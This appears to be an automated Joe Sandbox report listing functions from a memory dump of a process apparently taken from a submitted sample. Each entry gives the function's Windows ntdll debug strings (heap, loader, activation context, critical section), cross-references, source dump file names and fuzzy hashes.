RtlDebugPrintTimes.NTDLL ref: 01AEA7C0
RtlDebugPrintTimes.NTDLL ref: 01AEA895
RtlDebugPrintTimes.NTDLL ref: 01AEA8E8
RtlDebugPrintTimes.NTDLL ref: 01AEA907
RtlDebugPrintTimes.NTDLL ref: 01AEA938

Strings

HEAP: , xrefs: 01AEA686

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP:
API String ID: 3446177414-2466845122
Opcode ID: 56add765786a309d4a4f5b0056c9cd5ce68ab64d197324b7da4902e8f9c6819e
Instruction ID: 6988ebb4f750f109cc24c4620a7017658bf4ffc98c369ea368485813bbde4eeb
Opcode Fuzzy Hash: 56add765786a309d4a4f5b0056c9cd5ce68ab64d197324b7da4902e8f9c6819e
Instruction Fuzzy Hash: FFA17B75A043118FD716CF28C898A2ABBF5BF88314F19456DEA4ADB311E770EC46CB91

Function 01A47630 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing section info %ws..., xrefs: 01A84787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A84725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A846FC
Execute=1, xrefs: 01A84713
ExecuteOptions, xrefs: 01A846A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A84742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A84655

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 97353e4e1d8ca1cc933fec83924debdd439245827c76b1d7a46ce2bc34124ab8
Instruction ID: 288f6604016c6858955ee144bf030e6d9c1225e1151eb97d23cb90977847761f
Opcode Fuzzy Hash: 97353e4e1d8ca1cc933fec83924debdd439245827c76b1d7a46ce2bc34124ab8
Instruction Fuzzy Hash: CB51183160025ABBEF21EBE9DD85FAA77B9EF98304F0400A9D605A7181EB709A458F50

Function 01A2A250 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON

Download Yara Rule

Strings

Actx , xrefs: 01A77A0C, 01A77A73
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A779D5
RtlpFindActivationContextSection_CheckParameters, xrefs: 01A779D0, 01A779F5
RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 01A77AE6
SsHd, xrefs: 01A2A3E4
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A779FA

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-1988757188
Opcode ID: 50badb5371f8f25f8e92c9735fc0c530ddcc88acc19e5db3c155004649ce11aa
Instruction ID: 650798294f28a90ffec4251d90c032a30b79dda06c5d43698164d2046f8e0af2
Opcode Fuzzy Hash: 50badb5371f8f25f8e92c9735fc0c530ddcc88acc19e5db3c155004649ce11aa
Instruction Fuzzy Hash: A7E1C4716043128FE725CF6CC988B2BBBE1BB84314F184A2DF966CB691D771D945CB82

Function 01A2D770 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A7948C

Strings

Actx , xrefs: 01A79508
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 01A79565
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A79346
RtlpFindActivationContextSection_CheckParameters, xrefs: 01A79341, 01A79366
GsHd, xrefs: 01A2D874
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01A7936B

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: 19804e1190fb63bbf977c0e985b3063224a785941fb01aa9259714cf791c6ed1
Instruction ID: 22b722940a8856acc1a70e7335119c8e8bdb35b4f1b082932afe5cdd9c8084c1
Opcode Fuzzy Hash: 19804e1190fb63bbf977c0e985b3063224a785941fb01aa9259714cf791c6ed1
Instruction Fuzzy Hash: 0EE180706043528FDB25CF6CC884B6BBBE5BB88318F08496EF995CB282D771D944CB52

Function 01ABF525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01ABF556

Strings

Just allocated block at %p for %Ix bytes, xrefs: 01ABF708
RtlAllocateHeap, xrefs: 01ABF56D
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 01ABF7BE
HEAP[%wZ]: , xrefs: 01ABF6E7, 01ABF794, 01ABF7EB
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01ABF809
HEAP: , xrefs: 01ABF6F4, 01ABF7A1, 01ABF7F8

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 0abe649501c054d42f965b33d97cf43d10facbbcb021e6377e370b24aa1e1014
Instruction ID: 0777e7a4493f19970257eb83629cd3728e9400123637cd2dfb594d1ae46e6f86
Opcode Fuzzy Hash: 0abe649501c054d42f965b33d97cf43d10facbbcb021e6377e370b24aa1e1014
Instruction Fuzzy Hash: 16911F35A002C1DFDB12DFA8D980AEDBBF6FF59714F18805DE945AB2A2CB359840CB10

Function 01A8FD82 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A8FE73
RtlDebugPrintTimes.NTDLL ref: 01A8FE95

Strings

minkernel\ntdll\ldrdload.c, xrefs: 01A8FDE8
LdrpRedirectDelayloadFailure, xrefs: 01A8FDDE
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 01A8FDD8
Unknown, xrefs: 01A8FDC2, 01A8FDD4
$, xrefs: 01A8FE3D

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: eb003d6298beeab2534376c3b6435ebbcbf386a13959d63db05956a984d7bfaa
Instruction ID: 6ad2b054a2054f04cf56a09ce938b0f2e09338f77d7ec956e55a78854c92707e
Opcode Fuzzy Hash: eb003d6298beeab2534376c3b6435ebbcbf386a13959d63db05956a984d7bfaa
Instruction Fuzzy Hash: D8418FB5A0020AAFDF11EF99C980AEEBBB5FF48B14F140119EA05A7341D771DD51CBA0

Function 01ABFD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01ABFDAE

Strings

About to free block at %p with tag %ws, xrefs: 01ABFF7E
About to free block at %p, xrefs: 01ABFE8A
HEAP[%wZ]: , xrefs: 01ABFE6C, 01ABFF57
RtlFreeHeap, xrefs: 01ABFDC8, 01ABFE32
HEAP: , xrefs: 01ABFE79, 01ABFF64

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: c664d6d410ae7edf538ca1d4bcb3bf08dcb9846edc4ff2137ef65dc3154049c7
Instruction ID: 41ae8252dfd9b9e88fe0b52b67989cffeb938f4101615b179214fa50ce0555a8
Opcode Fuzzy Hash: c664d6d410ae7edf538ca1d4bcb3bf08dcb9846edc4ff2137ef65dc3154049c7
Instruction Fuzzy Hash: 4171FF31A00285DFDB22DFA8DA806EDFBF6FF59714F08805EE5459B292C7359980CB90

Function 01A065B5 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A06664
RtlDebugPrintTimes.NTDLL ref: 01A066AF

Strings

Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 01A69AB4
minkernel\ntdll\ldrinit.c, xrefs: 01A69AC5, 01A69B06
LdrpLoadShimEngine, xrefs: 01A69ABB, 01A69AFC
Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 01A69AF6

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-3589223738
Opcode ID: 82adb249af191109f61caed4d3c6cf80e48d414c17eaf44d50e43e4164eaac59
Instruction ID: 9998ab64a9eff060d313b5782265a372e012382c9849fca2d54e410e936007d8
Opcode Fuzzy Hash: 82adb249af191109f61caed4d3c6cf80e48d414c17eaf44d50e43e4164eaac59
Instruction Fuzzy Hash: 9E513832B103599FDB2ADB6CDC48FAD7BF6BB60308F040119E549AB29ADB709C51C790

Function 01A3D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A3D959

Part of subcall function 01A14859: RtlDebugPrintTimes.NTDLL ref: 01A148F7

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A7F2D8
$, xrefs: 01A3D900
LdrShutdownProcess, xrefs: 01A7F2CE
Process 0x%p (%wZ) exiting, xrefs: 01A7F2C7
$, xrefs: 01A3D86D

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 61e97cae77a2ae379fe2a5f7e816b7769a73b8c49468e0acd7b23d93e45f8323
Instruction ID: ced0dbfc7cbd80a89c7696cae76e1c3bc32364e6189c52ec23fc969ebe26127d
Opcode Fuzzy Hash: 61e97cae77a2ae379fe2a5f7e816b7769a73b8c49468e0acd7b23d93e45f8323
Instruction Fuzzy Hash: BD511171A00346DFDB26DFE8C58479DBBB2BF98314F684159E909AB286C770A945CB80

Function 01A3DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A7F611

Strings

, passed to %s, xrefs: 01A7F662
RtlUnlockHeap, xrefs: 01A7F65D
HEAP[%wZ]: , xrefs: 01A7F63A
HEAP: , xrefs: 01A7F647
Invalid heap signature for heap at %p, xrefs: 01A7F653

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: 9161f43e9fda60b7fa02a9c7e70cc18c7d7d14150008dddab38f9349d6dd3d5a
Instruction ID: c56101e12d6e0e8d7c7a84996f47d66db9159f7a614ac590e8ee7004f4818692
Opcode Fuzzy Hash: 9161f43e9fda60b7fa02a9c7e70cc18c7d7d14150008dddab38f9349d6dd3d5a
Instruction Fuzzy Hash: 98416631A00681DFD72BDFA8C988B6AB7F4FF80724F148169E51587391C778EA80CB91

Function 01ABF157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01ABF250
RtlDebugPrintTimes.NTDLL ref: 01ABF2C5

Strings

Entry Heap Size , xrefs: 01ABF26D
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 01ABF263
---------------------------------------, xrefs: 01ABF279
HEAP: , xrefs: 01ABF15D

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 2e725250a81c1c849aaf5aa9b4bd8ae26b83cd6b709d8c9fafa8135ab5ee583d
Instruction ID: b5ddb1ce6e3c756d2533d4286933a6b334880a0eb3e87ece4fdd282a02ab92a8
Opcode Fuzzy Hash: 2e725250a81c1c849aaf5aa9b4bd8ae26b83cd6b709d8c9fafa8135ab5ee583d
Instruction Fuzzy Hash: FB411139A00251DFCB26DF19E9C4999BBF9FF5A34471980AAD509DB316C731EC42CB90

Function 01A3DBA0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A7F757

Strings

, passed to %s, xrefs: 01A7F7A8
RtlLockHeap, xrefs: 01A7F7A3
HEAP[%wZ]: , xrefs: 01A7F780
HEAP: , xrefs: 01A7F78D
Invalid heap signature for heap at %p, xrefs: 01A7F799

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 9ee832f6ddc94c11d14317c089852731dee359396d3b03fadd08f0f84545c1bc
Instruction ID: 1100c720ef2cfab4e70fb87cae0c0e6a020cd1a255de0f3e096448b21378be95
Opcode Fuzzy Hash: 9ee832f6ddc94c11d14317c089852731dee359396d3b03fadd08f0f84545c1bc
Instruction Fuzzy Hash: 51313934254780DFD727DB6CCA49B66BBE4EF41B50F044059F45687692C7B4EA80C761

Function 01A5B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01A5B6BF

Strings

0, xrefs: 01A5B695
0, xrefs: 01A5B66F
-, xrefs: 01A5B650
+, xrefs: 01A5B65A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: e244075547fc5ac0e3894e226ab8bb8d2732dc9ff8578af76728c1d5c4fb8f25
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 65819F70E0A2499EEF658F6CC8917BEBBB3AF45322F1C4159DC61A76D1C73498408B71

Function 01A19126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A72559

Strings

$, xrefs: 01A19191
@, xrefs: 01A19175

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: 029c7a592be295e9803f637ae1c965f9221b9bad24f497919bf20a86c84c4f64
Instruction ID: a7fe8abbc1640089eed7c7d70b8350a32a9110b4513f3a5b2e9bff56ae740e94
Opcode Fuzzy Hash: 029c7a592be295e9803f637ae1c965f9221b9bad24f497919bf20a86c84c4f64
Instruction Fuzzy Hash: 3481FB71D002699BDB35DB54CD44BEAB7B8AB48754F0441EAEA1EB7280E7705E84CFA0

Function 01A44D1D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A44D64

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01A83640, 01A8366C
LdrpFindDllActivationContext, xrefs: 01A83636, 01A83662
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 01A8362F
Querying the active activation context failed with status 0x%08lx, xrefs: 01A8365C

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: fd95aa6268302583aa11dd02cf67cbc21fc14f9d2231cbac9a388db4221eefe4
Instruction ID: 18eed85e65d2a42c7d68a3eb1832b1ac80214625801a6c53009e5fbb73f5a6f1
Opcode Fuzzy Hash: fd95aa6268302583aa11dd02cf67cbc21fc14f9d2231cbac9a388db4221eefe4
Instruction Fuzzy Hash: C7311C32900611EFEF37AB0CCC49B36B6B4BB89754F0A412AD68957151E7B0DD8887D5

Function 01AC20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01AC214F
___swprintf_l.LIBCMT ref: 01AC2172

Strings

]:%u, xrefs: 01AC2169
[, xrefs: 01AC212B
%%%u, xrefs: 01AC2146

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 1c613d767c6bdd36229200d7c4c80ab5fe753fc6926ec8c460294d9ac4ce6a82
Instruction ID: a850e7029d9a5c32088b3970bc5cf10e53031dcab4d3c31ecc098092188453ff
Opcode Fuzzy Hash: 1c613d767c6bdd36229200d7c4c80ab5fe753fc6926ec8c460294d9ac4ce6a82
Instruction Fuzzy Hash: F421477AA00219ABDB11DF79DD40AFE7BF8EF94A54F45011AEE05E3240E730D9018BA1

Function 01A54960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A549A4

Strings

0IFw, xrefs: 01A54A03
X, xrefs: 01A549F0
0IFw, xrefs: 01A54A13
0IFw, xrefs: 01A54A23

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0IFw$0IFw$0IFw$X
API String ID: 3446177414-2496372868
Opcode ID: 8a965bb47a7e3da128fcf26d70b1a988cfb410068805e46a1969032c1fd195a0
Instruction ID: 10a63a55e6edbdf8e45d7f81a7f0a03ff1b2f948c46cfdc07b8d4aeb7eb5e82a
Opcode Fuzzy Hash: 8a965bb47a7e3da128fcf26d70b1a988cfb410068805e46a1969032c1fd195a0
Instruction Fuzzy Hash: D1319131E0824AEBEFA2CF59D840B8D3BB1AB9C754F004059FE0897252E3749A90CF45

Function 01A3F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A802BD
RTL: Re-Waiting, xrefs: 01A8031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A802E7

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 13b5a5365340664a713f63952fe692d9764f26633a3a34198759c9a99b5b469c
Instruction ID: 7e6d18add7100dd1dfe8f5f8c0988c3f37c3867f8a6ac5716fe580d37a633ee8
Opcode Fuzzy Hash: 13b5a5365340664a713f63952fe692d9764f26633a3a34198759c9a99b5b469c
Instruction Fuzzy Hash: A3E1AE70A187429FD726DF28C984B2ABBE0BF84324F140A5DF5A5CB2E1D774D849CB42

